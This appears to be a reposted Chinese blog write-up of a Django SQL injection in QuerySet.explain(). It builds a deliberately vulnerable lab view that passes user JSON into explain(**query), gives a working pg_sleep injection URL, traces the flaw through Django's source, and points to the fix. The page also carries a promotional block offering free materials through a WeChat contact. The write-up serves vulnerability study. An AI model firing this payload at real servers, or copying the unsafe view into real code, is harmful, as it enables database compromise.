?
漏洞簡介
在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中發現了SQL注入問題,這是通過傳遞一個精心編制的字典(帶有字典擴展)作為**options引數來實作的,并將注入負載放置在選項名稱中,
影響版本
2.2 =< Django < 2.2.28
3.2 =< Django < 3.2.13
4.0 =< Django < 4.0.4
環境搭建
創建存在 漏洞 Django 版本 3.2.12 專案
創建 startapp Demo 并依次修改檔案
安裝 postgresql 資料庫
settings.py 設定連接資料庫為 postgresql 資料庫
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'test',
'USER': 'postgres',
'PASSWORD': '123456',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}urls.py 設定對應路由
from django.contrib import admin
from django.urls import path
?
from Demo import views
?
urlpatterns = [
path('admin/', admin.site.urls),
path('index/', views.index),
path('demo/', views.users),
path('initialize/', views.loadexampledata),
]models.py
from django.db import models
?
# Create your models here.
class User(models.Model):
name = models.CharField(max_length=200)
?
def __str__(self):
return self.nameviews.py
import json
?
?
from django.http import HttpResponse
from django.shortcuts import render
?
# Create your views here.
from .models import User
?
?
?
def index(request):
return HttpResponse('hello world')
?
def users(request):
query = request.GET.get('q')
query = json.loads(query)
qs = User.objects.get_queryset().explain(**query)
return HttpResponse(qs)
?
?
def loadexampledata(request):
u = User(name="Admin")
u.save()
u = User(name="Staff1")
u.save()
u = User(name="Staff12")
u.save()
return HttpResponse("ok")?
漏洞復現
http://127.0.0.1:8000/demo/?q={"ANALYZE)+select+pg_sleep(5);--+":"aaa"}
?
發現成功構造使得服務器沉睡
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
漏洞分析
在進行代碼分析之前,我們先了解一個知識點 EXPLAIN
EXPLAIN
EXPLAIN -- 顯示一個陳述句的執行計劃
?
EXPLAIN [ ( option [, ...] ) ] statement
EXPLAIN [ ANALYZE ] [ VERBOSE ] statement
?
option:
ANALYZE [ boolean ] 執行命令并顯示實際運行時間
VERBOSE [ boolean ] 顯示規劃樹完整的內部表現形式,而不僅是一個摘要
COSTS [ boolean ]
BUFFERS [ boolean ]
TIMING [ boolean ]
FORMAT { TEXT | XML | JSON | YAML }
?
statement:
查詢執行計劃的 SQL 陳述句,可以是任何 select、insert、update、delete、values、execute、declare 陳述句EXPLAIN ANALYZE不僅會顯示查詢計劃,還會實際運行陳述句,EXPLAIN ANALYZE會丟掉任何來自SELECT陳述句的輸出,但是該陳述句中的其他操作會被執行(例如INSERT、UPDATE或者DELETE),
除錯分析
django.db.models.query.QuerySet.explain?
django.db.models.sql.query.Query.explain?
django.db.models.sql.compiler.SQLCompiler.explain_query?
django.db.models.sql.compiler.SQLCompiler.execute_sql?
django.db.models.sql.compiler.SQLCompiler.as_sql?
在這里會根據所選擇的資料庫,來呼叫其相對應的 explain_query_prefix 方法
django.db.backends.postgresql.operations.DatabaseOperations.explain_query_prefix?
postgresql? 中 重寫了 explain_query_prefix 方法將鍵名拼接到了 SQL 陳述句中
最后執行的 SQL 陳述句是
'EXPLAIN (ANALYZE) SELECT PG_SLEEP(5);-- true) SELECT "Demo_user"."id", "Demo_user"."name" FROM "Demo_user"'?
漏洞修復
https://github.com/django/django/commit/00b0fc50e1738c7174c495464a5ef069408a4402#diff-fbd8a517f5fa1333b9f7273bcd007551cd2fb4b8f6732cd6002ba42411802901
做了一個過濾,發現危險字符就拋出例外
只有字串在白名單內才會拼接到陳述句中
更多網安技能的在線實操練習,請點擊這里>>
合天智匯:合天網路靶場、網安實戰虛擬環境
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/552828.html
標籤:其他
下一篇:返回列表